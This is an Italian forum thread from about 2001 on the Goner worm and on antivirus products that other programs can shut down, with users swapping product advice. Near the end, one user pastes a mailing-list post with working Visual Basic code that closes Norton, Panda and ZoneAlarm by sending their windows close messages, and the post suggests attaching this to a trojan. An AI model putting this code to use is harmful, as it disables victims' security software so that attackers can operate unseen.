Sicurezza Antivirus

[piorio]

Salve a tutti,
dopo l'infezione del 4 Dicembre di Goner, un virus che ha comportamenti da retrovirus (ovvero attacca i principali software di antivirus e firewall), si parla di sicurezza degli antivirus che non dovrebbero disabilitarsi mai, in alcun momento!
Questo problema lo avevo già espresso sui vari newsgroup realizzando un exploit a puro scopo informativo per porre rimedio a questa situazione.
In particolare la tecnica da me usata è molto diversa da quella di un semplice process killer (come Goner), ma usa un'API di Windows per notificare agli antivirus lo spegnimento (fasullo) del sistema.
Tale tecnica permette di disabilitare antivirus come Panda che utilizzano una doppia protezione (VxD statico + eseguibile) cosa che invece non riesce a fare Goner.
Tutto questo in data 25 Novembre.
Il 30 Dicembre Kaspersky (di AVP antivirus) rilascia una patch riconoscendo il mio exploit come ",Win32.piorio",.
Importante è dire che le altre case produttrici nulla hanno fatto per porre rimedio!

[Triumph Of Steel]

Io AVP lo uso da molto tempo, e l'ho sempre consigliato...
secondo me è uno dei migliori.. e forse anche quello che appesantisce meno il sistema.. a differenza di altri (leggi Norton )

[rayden]

io uso f-secure e sono curioso di vedere se fà lo stesso sulla mia macchina...

[piorio]

Credo anche io che siano due ottimi prodotti, io specialmente preferisco AVP.
La bontà è indiscussa, comunque ci sono delle pecche piuttosto strane, degli errori di distrazione che ne compromettono l'efficacia.
Credo che tali problemi possano definirsi degli ",errori di gioventù", ma non possano essere giustificati in alcuna maniera in prodotti che sono sul mercato da diversi anni già in ambiente DOS

[oldcarlo]

qualcuno sa dirmi come si comporta pccillin in questo caso Mi funziona benissimo, e ho Zone Alarm come firewall. Questo retrovirus li disattiva? O devo contattare trend? Grazie, carlo gualtieri

[piorio]

Ciao,
a proposito di Pc-cillin non ti posso dire niente perchè non l'ho testato.
Norton Antivirus e InoculateIT invece ne sono immuni.
Se puoi pazientare qualche giorno ti faccio sapere.
Volevo comunque farti notare che la mia utility è stata sottoposta a test commissionati dal portale About.com ed hanno riscontrato problemi anche con altri antivirus, ma a me non hanno detto quali.

[dado]

In data 17/12/01 22:16, piorio ha scritto:

Norton Antivirus e InoculateIT invece ne sono immuni.

Intendi dire quindi che aggiornandolo Norton riconosce il Goner?

[piorio]

Ciao dado,
no mi riferivo ad un exploit da me programmato.
Comunque credo che ormai per Goner ci siano molti update e non sia un problema rimuoverlo.

[Pantagru]

Proprio mentere leggevo le vostre risposte su un altro argomento (Go in.exe) ho ricevuto da mio fratello un email con virus.
Sono andato da lui, ho installato il PCcilling e l'ho aggiornato. Purtroppo non ha individuato in alcun modo il virus.
Scusate le domande da poco competente, ma sbaglio o questi antivirus
- non individuano i virus negli attachment PRIMA che si scatenino
- non individuano i virus DOPO che si sono scatenati
- individuano il virus solo nel momento in cui questo viene attivato?

Si potrebbe disabilitare quel virus manualmente, ma il problema è la diagnosi.
Ha preso un brano da un file di testo, ha allegato una GIF più il virus (in questo caso un COLORE.BAT) e l'ha mandato ad alcuni indirizzi in rubrica. Inoltre forse sbarra l'accesso a mcafee.com

[radius43]

x PIORIO
questa storia farebbe rabbrividire se non fosse che si parla di virus informatici...
quelli veri..non tutti ..usano tecniche simili x entrare nelle difese umane:simulano proteine del corpo umano o si legano a proteine su siti non visibili!
detto questo passo alla mia richiesta:cosa dovrei fare avendo pc-cillin 2000 x evitare questi problemi????
dovrei inviare una mail al servizio di assistenza e dire cosa????
grazie x l'eventuale supporto tecnico...
Lorenzo

[piorio]

X radius:
Per prima cosa devo dirti che non ho effettuato il test con Pc-cillin.
Il problema che ho messo in luce, però, non è stato affatto risolto nemmeno da Kaspersky.
Infatti hanno rilasciato l'update che individua il mio exploit, ma già se il codice lo ricompilo sotto Vb, per esempio, già non viene riconosciuto!!
Se usi Windows 98/Millenniumm ti consiglio vivamente di utilizzare InoculateIT che utilizza un meccanismo di caricamento statico che non può essere in alcuna maniera disabilitato.
Per gli altri antivirus non so proprio cosa dire.

[radius43]

x PIORIO PAOLO

inoculate lo trovo come demo....free...o in prova?
se volessi uno gratuito discretamente efficace cosa mi consigli?
in alternativa se inoculate è demo o in prova trovo qualcosa in giro x renderlo full?
ciao
Lorenzo

[piorio]

InoculateIt dovrebbe avere una licenza completa per privati tanto che io tempo fa lo installai da qualche rivista in edicola.
http://ca.com/etrust/downloads/inoculat ... it_reg.htm
Il sito dice che la versione è una trial completa, ma non so che dirti.
Prova e poi ci fai sapere.

[dado]

X Radius: vai qui e lo trovi freeware.

http://www.hwfiles.it/dett/792.html

[cds13]

Incredibile, il freeware è più affidabile!
Uso INOCULATE da molto tempo e devo dire che è proprio ottimo.
Ho provato anche AVIR e mi è sembrato ottimo.
Mi capita di ricevere per posta qualcosa come 20 virus al mese (per lo più sircam ed hybris) e li conservo per vedere come l' antivirus li "pesca"
e questi due lavoravano alla grande!
E-safe desktop (aggiornato) non pescava quasi nulla.
F-prot per DOS mi becca pure i back orifices!
E' da qualche tempo che uso solo freeware, potrebbe essere una politica...

[Rhost]

Mi permetto di incollarvi una mail arrivata in sicurezza.org che riguarda l'argomento appena discusso:
Le case produttrici di AV hanno ritenuto questo bug irrisorio... tranne AVP
che ha provveduto a rilasciare una patch. Per curiosità ho scritto due righe
di codice in VB utilizzando l'API in questione... il codice è il seguente :

--
Const WM_CLOSE = &H10

Private Declare Function FindWindowA Lib "user32" _
(ByVal lpClassName As Any, ByVal lpWindowName As Any) As Integer

Private Declare Function SendMessageA Lib "user32" _
(ByVal hWnd As Integer, ByVal wMsg As Integer, _
ByVal wParam As Integer, lParam As Any) As Long

Private Function Killer(hWnd&)
Dim Res&
Res = SendMessageA(hWnd, WM_CLOSE, 0, 0)
Res = SendMessageA(hWnd, WM_DESTROY, 0, 0)
End Function

Private Sub Form_Load()
Dim hWnd&
hWnd = FindWindowA(vbNullString, "Navapw32")
Killer (hWnd)
hWnd = FindWindowA(vbNullString, "Panda Antivirus 6.0 Platinum")
Killer (hWnd)
End Sub

--

... Non fate caso ai nomi delle funzioni mi sono lasciato trasportare =)
ho aggiunto una piccolezza rispetto ad altro codice che ho letto, che è
"FindWindowA" semplicemente va a ricercare i parametri dell'applicazione da
"contattare" in base al nome della stessa...

Cosa accade... semplicemente si fa credere all'antivirus che windows sta per
terminare la sessione e quindi gli si chiede ( SendMessageA ) gentilmente di
andare a fare... insomma di tornare da dove è venuto =)

La cosa carina è che lo stesso accade con i firewall (ho testato solo
ZoneAlarm).. lo si puo testare aggiungendo nel Form_Load :

hWnd = FindWindowA(vbNullString, "Zonealarm")
Killer (hWnd)

L'ultima versione di panda è ancora "vulnerabile", mentre norton ( anche
avendo ritenuto tutto ciò irrisorio ) nell'ultima versione dopo aver
effettuato l'update ciò non accade...

altri AV sono risultati vulnerabili (non testati da me personalmente) come :

AVP
F-Prot
McAfee
Pc Cillin 2002 NT Version

lascio a voi le considerazioni... anche se io credo che il problema abbia
una certa rilevanza, dato che con qualche artificio magari si puo collegare
il tutto ad un trojan di vecchio stampo, e quindi dargli la possibilità di
disattivare l'AV e magari anche il firewall giusto per il tempo che serve
all'attacker di fare cio che vuole...
insomma potrebbe essere un modo per dar sfogo alla fantasia =)

Fatemi sapere cosa ne pensate..

bye
-NeM <--- autore della mail
***********************************
Potete prenderne spunto per fare i vs test..
Nel caso avessi creato problemi a qualkuno con questo post, abbia la cortesia di segnalarlo..
ByEz Rhost.